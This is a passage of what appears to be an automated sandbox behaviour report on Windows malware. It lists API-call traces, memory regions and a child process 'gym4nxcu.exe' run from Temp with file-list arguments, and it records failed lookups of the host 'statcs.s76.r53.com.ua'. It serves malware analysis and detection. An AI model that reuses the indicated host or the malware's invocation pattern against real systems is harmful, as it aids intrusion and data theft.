wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, 
wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.193] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) 
[0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: 
lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 
lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1c, wMilliseconds=0x1d9)) [0116.194] VirtualFree (lpAddress=0x13f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0116.196] FreeLibrary (hLibModule=0x76910000) returned 1 [0116.196] LocalFree (hMem=0x704448) returned 0x0 [0116.196] FreeLibrary (hLibModule=0x76910000) returned 1 [0116.196] LocalFree (hMem=0x704438) returned 0x0 [0116.196] ExitProcess (uExitCode=0x0) Thread: id = 83 os_tid = 0xe18 [0115.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0115.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x14e8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0115.647] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1521ffc, cbMultiByte=27, lpWideCharStr=0x162ed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0115.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0115.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x14da714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0115.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0115.647] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x14e867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0115.647] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x162fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x162fbac | out: ppResult=0x162fbac*=0x0) returned 11001 [0115.688] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x162fb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x162fbac | out: ppResult=0x162fbac*=0x0) returned 11001 [0115.716] getnameinfo (in: pSockaddr=0x162fc14, SockaddrLength=0x0, pNodeBuffer=0x143831c, NodeBufferSize=0x401, pServiceBuffer=0x1505124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="", pServiceBuffer="") returned 10047 [0115.716] htons (hostshort=0x0) returned 0x0 [0115.717] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0115.717] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, 
lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] SetEvent (hEvent=0x84) returned 1 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] GetCurrentThreadId () returned 0xe18 [0115.717] CloseHandle (hObject=0xb8) returned 1 [0115.717] RtlExitUserThread (Status=0x0) Thread: id = 85 os_tid = 0xe24 Process: id = "50" image_name = "gym4nxcu.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe" page_root = "0x7ea167e0" os_pid = "0xdf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "46" os_parent_pid = "0xdb0" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7789 start_va = 
0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7790 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7791 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 7792 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7793 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7794 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7795 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7796 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7797 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7877 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7878 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7879 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" 
filename = "" Region: id = 7880 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 7881 start_va = 0x520000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 7882 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7883 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7884 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 7885 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7886 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7887 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7888 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7889 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 
region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7890 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7891 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7892 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7893 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 7894 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7895 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7896 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7897 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7898 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file 
name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8267 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8268 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 8269 start_va = 0x5f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 8270 start_va = 0x700000 end_va = 0x12fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 8271 start_va = 0x1300000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 8272 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8273 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8274 start_va = 0x300000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 8275 start_va = 0x1440000 end_va = 0x170efff entry_point = 0x1440000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8276 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 8277 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = 
"profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 8278 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x1d0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 8279 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 8280 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 8281 start_va = 0x1710000 end_va = 0x179ffff entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 8282 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8283 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8377 start_va = 0x17a0000 end_va = 0x189ffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 8378 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 8379 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 8485 start_va = 0x18a0000 end_va = 0x199ffff entry_point = 0x0 
region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 8486 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 80 os_tid = 0xdf8 [0116.430] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0116.430] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0116.430] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0116.430] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0116.430] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0116.430] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0116.431] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0116.431] GetProcAddress 